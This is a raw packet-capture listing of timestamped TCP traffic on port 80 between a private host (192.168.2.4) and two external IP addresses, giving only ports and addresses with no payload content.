Nov 30, 2024 04:06:46.316190958 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.338407993 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.338458061 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.338476896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.338522911 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.338644028 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.338690996 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.338736057 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.338785887 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.339622974 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.339673996 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.339701891 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.339752913 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.340572119 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.340616941 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.340790033 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.340832949 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.341538906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.341587067 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.341650009 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.341727972 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.342487097 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.342540979 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.342695951 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.342746019 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.343429089 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.343475103 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.343553066 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.343597889 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.344398022 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.344451904 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.344511986 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.344552994 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.345369101 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.345418930 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.345469952 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.345520020 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.346314907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.346364975 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.346398115 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.346447945 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.347278118 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.347336054 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.347390890 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.347434044 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.348253965 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.348310947 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.348359108 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.348411083 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.349204063 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.349250078 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.349283934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.349339008 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.350147963 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.350202084 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.350261927 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.350336075 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.351145029 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.351190090 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.351214886 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.351284981 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.352080107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.352128983 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.352229118 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.352281094 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.353050947 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.353096962 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.353136063 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.353185892 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.354006052 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.354060888 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.354098082 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.354135990 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.354973078 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.355022907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.355027914 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.355071068 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.355914116 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.355963945 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.356025934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.356076956 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.356869936 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.356923103 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.356976986 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.357069969 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.357846022 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.357894897 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.357944965 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.357996941 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.358814001 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.358863115 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.358894110 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.358942032 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.359751940 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.359858036 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.359859943 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.359905958 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.360708952 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.360760927 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.360815048 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.360858917 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.361752987 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.361764908 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.361805916 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.362637997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.362761021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.362803936 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.363601923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.363657951 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.363761902 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.363810062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.364559889 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.364612103 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.364677906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.364769936 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.365520954 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.365570068 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.365628004 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.365690947 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.366497993 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.366549969 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.366579056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.366628885 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.367491007 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.367537975 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.367554903 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.367652893 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.368426085 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.368474960 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.368510008 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.368556976 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.369379044 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.369427919 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.369491100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.369554043 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.370330095 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.370394945 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.370449066 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.370495081 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.371280909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.371325016 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.371403933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.371453047 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.372256994 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.372324944 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.372340918 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.372389078 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.373207092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.373250008 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.373305082 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.373354912 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.374146938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.374207020 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.374245882 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.374295950 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.375130892 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.375176907 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.375235081 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.375282049 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.376081944 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.376147032 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.376183987 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.376229048 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.377156973 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.377229929 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.378004074 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.378115892 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.378253937 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.378953934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.379093885 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.379121065 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.379224062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.379928112 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.380016088 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.380084991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.380160093 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.380855083 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.380901098 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.380970001 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.381258965 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.381833076 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.381880045 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.381902933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.381947994 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.434951067 CET	80	49865	34.107.221.82	192.168.2.4
Nov 30, 2024 04:06:46.446820021 CET	49865	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:46.446964979 CET	49865	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:46.510914087 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.510936975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.510974884 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.510996103 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.511337042 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.511384010 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.511440039 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.511487007 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.512269974 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.512345076 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.512383938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.512433052 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.513236046 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.513345003 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.513349056 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.513382912 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.514184952 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.514230967 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.514300108 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.514341116 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.515172005 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.515213966 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.515259027 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.515301943 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.516117096 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.516138077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.516165018 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.516200066 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.540009022 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.540065050 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.540126085 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.540168047 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.540273905 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.540298939 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.540427923 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.541244984 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.541294098 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.541326046 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.541369915 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.542175055 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.542227030 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.542290926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.542346954 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.543119907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.543282986 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.543330908 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.543394089 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.544080973 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.544127941 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.544248104 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.544291019 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.545084953 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.545142889 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.545211077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.545269966 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.546019077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.546066999 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.546104908 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.546962976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.546967030 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.547077894 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.547297001 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.547941923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.547982931 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.548051119 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.548278093 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.548887014 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.548937082 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.548978090 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.549030066 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.549839020 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.549920082 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.549957037 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.550101042 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.550808907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.550854921 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.550892115 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.550936937 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.551758051 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.551804066 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.551871061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.551935911 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.552727938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.552787066 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.552835941 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.552885056 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.553736925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.553747892 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.553786039 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.554651976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.554697990 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.554759979 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.554805994 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.555620909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.555670977 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.555728912 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.555793047 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.556574106 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.556627989 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.556695938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.556742907 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.557566881 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.557605982 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.557701111 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.557748079 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.558476925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.558594942 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.558648109 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.558695078 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.559428930 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.559530020 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.559559107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.559684992 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.560441017 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.560488939 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.560520887 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.560565948 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.561368942 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.561419964 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.561484098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.561527967 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.562335968 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.562426090 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.562580109 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.563276052 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.563318968 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.563375950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.563420057 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.564273119 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.564333916 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.564373016 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.564475060 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.565217972 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.565263033 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.565326929 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.565371990 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.566174984 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.566220999 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.566287041 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.566390991 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.567136049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.567178011 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.567248106 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.567293882 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.568146944 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.568188906 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.568198919 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.568208933 CET	80	49865	34.107.221.82	192.168.2.4
Nov 30, 2024 04:06:46.568248034 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.569046021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.569099903 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.569169044 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.569330931 CET	49840	80	192.168.2.4	185.215.113.16
